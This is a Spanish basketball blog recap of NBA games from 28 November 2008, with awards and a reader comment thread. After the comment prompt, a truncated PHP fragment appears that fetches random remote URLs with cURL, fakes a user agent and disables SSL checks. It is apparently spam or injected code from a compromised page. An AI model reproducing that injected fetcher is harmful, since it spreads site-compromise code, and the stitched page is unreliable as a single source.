La Crónica (28/11/08)

29 de November de 2008 por Jabho

Dice Bosh que puede ser MVP. Lo cierto es que está jugando a una gran nivel, pero además de jugar bien debe conseguir que su equipo gane. Como anoche, que los Raptors ganaron a los Hawks que se vienen desinflando trás ser el equipo revelación en el inicio.

En los Celtics por contra nadie lucha por el MVP. Su guerra es otra y lo saben. Anoche 7ª victoria consecutiva a pesar del mal partido del capi. Los Sixers, sin ser una gran decepción, no están ni de lejos cumpliendo con las expectativas.  Pero ojo, que estamos empezando y queda mucho.

En la misma que guerra que los verdes andan los Cavs. Muchos soprendidos, nosotros lo esperábamos. Los Warriors no tuvieron suerte, o no se movieron bien, en verano y de aquellos polvos estos lodos. Con la derrota de anoche ya son 5 seguidas.

Más dificil es saber cuál es la guerra de los Pistons. De momento nueva victoria ante los Bucks con un buen Hermman. Los Bucks sin Bogut, sin Redd… 

Victoria de los Bobcats ante los Pacers, eso si en la prorroga. Bien el backcourt del equipo de Brown en los últimos partidos que a pesar de ganar siguen penúltimos en el Este. Mucho deben mejorar.

Victoria de los Heat que trás el último ridículo salieron muy motivados desde el incio. Claro, que se aprovecharon de la baja de Nash en los Suns. El que huele a MVP es Wade a poco que meta a los Heat en Play Offs. Mal partido de Beasley que anoche no fue titular.

Los Thunder siguen perdiendo y son candidatos unánimes a quedar últimos. Anoche ante otro de los equipos que están abajo, de hecho un poco más de lo esperado, los Wolves. Pero todo hay que decirlo, con el cambio de entrenador los Thunder compiten más. Buenos partidos anoche de Durant y Green de aleros, donde quieren jugar, y de Westbrook y Wilcox desde el banco.

Como partido serio a pesar de la derrota el de los Grizzlies antes los Spurs. San Antonio jugó por primera vez en la temporada con Duncan, Manu y Parker. Memphis es el peor equipo de la liga en el balance asistencias / perdidas. Fundamental que mejoren en ambos aspectos.

Un tercer cuarto de 44-17 y los Jazz en casa y con Deron ganaron a los Kings. 8 jugadores por encima de 10 puntos y 15 asistencias de Deron (1 más que todos los Grizzlies juntos, por cierto). 

Victoria de los Blazers ante los Hornets con cierta comodidad y un gran Roy. Los Hornets son 8º del Oeste y aunque no hay porqué preocuparse, tampoco despistarse. En contra de lo que parece, hubiera jurado que defendían peor que el año pasado, encajan 3 puntos menos por partido que la temporada pasada. Pero anotan  4 menos y por ahí está la mejora. Y Pargo por Rusia. 

Cerramos con la victoria de los Lakers, una más, ante los Mavericks. 17 puntos seguidos al final del tercer cuarto y principio del cuarto y partido resuelto. Gran partido de Bryant y balance impecable de los Lakers. La duda de hace unos partidos entre Odom – Ariza…

CONCLUSIONES

Cleveland ha pasado de ser el 26º ataque de la liga con 96.5 puntos la temparada pasada a ser el 4º esta con 103.5 puntos a favor. También han mejorado en casi 3 el balance de puntos en contra. Y LeBron 35 minutos por partido (su año de rookie jugó 39.5 y todos los demás años por encima de 40). En el 2010 no sé, pero de momento alternativa clara a Celtics y Lakers…

Los Cavs son james-dependientes pero ¿no son los Hornets aun más paul-dependientes? 

Chris Paul dá 12 asistencias por partido y Memphis 15.6 ¿tiene sentido? Por cierto, anoche Gay nuevamente rosco en asistencias.

Okafor firmó una extensión millonaria este verano. Hace apenas 7.5 tiros cada noche. Está claro que no es un gran anotador pero…

PREMIOS

MVP: Pese a los buenos partidos de Kobe o Bosh el premio de ayer es para Wade: 43 puntos con buenos porcentajes y 6 asistencias.

El rookie: Pues no ganó pero el partido de OJ Mayo merece el premio: 32 puntos, también con buenos porcentajes, 4 asistencias, 4 rebotes,  3 robos… 

La sorpresa: Partidazo de Craig Smith en la victoria de los Wolves: 23 puntos y 8 rebotes.

La decepción: Ya se que es rookie pero fue pick 2 y se espera mucho de él. Viendo además como están jugando Mayo o Westbrook… 0 puntos y 0-5 en tiro para Beasley anoche.

El mayor esfuerzo en vano: El de Granger y sus 35 puntos y 6 rebotes. Terry y Mayo anduvieron cerca.

La pregunta de la jornada ¿Cual es el jugador que menos se está ganando la extensión millonaria del contrato firmado este verano? Propongo candidatos: Deng, Okafor, Smith e Iguodala.

A falta de videos os dejo con una foto del banquillo de los Sixers en el último cuarto de su partido ante los Celtics. Significativa.

Comenta

6 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Suena un traspaso Portland-Memphis en el que estaría incluido Mike Conley por parte de Memphis y Outlaw&Sergio por los Blazers. Me gusta mucho por Sergio, que puede formar una pareja tremenda con OJ, pero Travis es otro de esos que no ve mas allá de la canasta, cuidadín con eso.

    Y antes de que pierda prestigio los Grizzlies deberian desprenderse de Rudy Gay, a poder ser para conseguir un hombre interior. Anoche estaban en el partido, el estaba haciendo su típico juego de jugarselas todas, y cuando llegó el momento de la verdad, a falta de 5 minutos se tiró dos castañas y acto seguido Duncan le hizo un 2+1, ahí se acabó el partido.

    La buena noticia la tienen claramente en Mayo, que jugadorazo por dios!!!!

    En cuanto a la pregunta, mi respuesta es Iguodala, porque los otros estan teniendo factores externos que influyen, aunque ellos tampoco esten muy finos.

    Para terminar, Bosh no se si estará al final en las quinielas por el MVP, pero desde luego que para entrar en el mejor quinteto habrá ondonadas de ostias.

      Citar

  2. Jabho dice:
    #2

    Pues si Viva, yo a OJ Mayo lo veía un bluff total y vaya crack. Está jugando muuuucho mejor que en la NCAA.

    La pregunat diria que el peor es Deng de momento. La cosa es que los Bulls no han renovado a Gordon y si a Deng y no sé yo si no se arrepentiran a finald e temporada de haberlo hecho al reves.

    A mi Outlaw cada día me gusta menos por lo que dices. Y Gay nada de nada. Dos que van de estrellitas. El trade que dices sería bueno porque además jugaría mas Lowry que me parece un jugoncete.

      Citar

  3. TheDeerHunter dice:
    #3

    No entiendo cual es el factor externo que le puede influir a Okafor… mi voto es para él.

    Al que descarto completamente para la cuestión es Josh Smith… que su equipo sí le está notando mucho en falta y eso quiere decir algo.

    El tema de los Grizzlies… me parece increíble que no se pueda enseñar a jugar al baloncesto a un tipo con tanta capacidad como Rudy Gay. Talento y físico al servicio de un desconocimiento profundo del juego. ¿de quien es la responsabilidad de todo esto?? ¿seguro que suya?? tiene 22 años, señores… en algunas partes del mundo alguien le estaría enseñando fundamentos.

    El tema de Mayo… medalla para Viva, que ya nos lo avisó. Anoche fue el primer partido completo que le vi y me impresionó. Cómo hace de fácil el baloncesto, el chaval. En cualquier caso, y no lo digo por anoche… tampoco me termina de molar el camino que lleva.

    Punto de mira en Iavaroni y sus secuaces.

      Citar

  4. Hynreck dice:
    #4

    Mi voto tambien seria para Deng, Que coño le está pasando?

    En fin, en el lado positivo a Felton parece que le sienta bien la competencia seria de Augustin

      Citar

  5. telekoman dice:
    #5

    Jejeje, Hynreck, como se nota que lo de Felton lo llevas en lo más profundo del alma. Es lo que tiene la TJ, que hace que los jugadores sean realmente como tuyos.
    Lo Gay es sinceramente para hacerselo mirar. Anda que iba a jugar mucho este aquí si pillara a algún entrenador que otro conocidos por todos.
    Yo creo que Deng es la respuesta clara a la pregunta.

      Citar

  6. Viva_Dirk dice:
    #6

    Para mi Okafor tiene el factor Larry Brown, que automáticamente es disponer de 10 posesiones menos por partido, el lo esta haciendo mal pero ese es el atenuante que yo le veo. Y Deng las lesiones. Iguodala esta en el mismo equipo con el mismo entrenador, sano completamente, si no sabe aceptar la llegada de Brand es un desperdicio gordo de dinero.

    Lo que dice Deer de Rudy Gay es simple, en otro sitio con 22 años no estaría ganando lo que gana ni siendo la estrella del equipo. Es la pescadilla que se muerde la cola, uno de los cientos de ejemplos de jugadores que llegan poco formados a la NBA.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>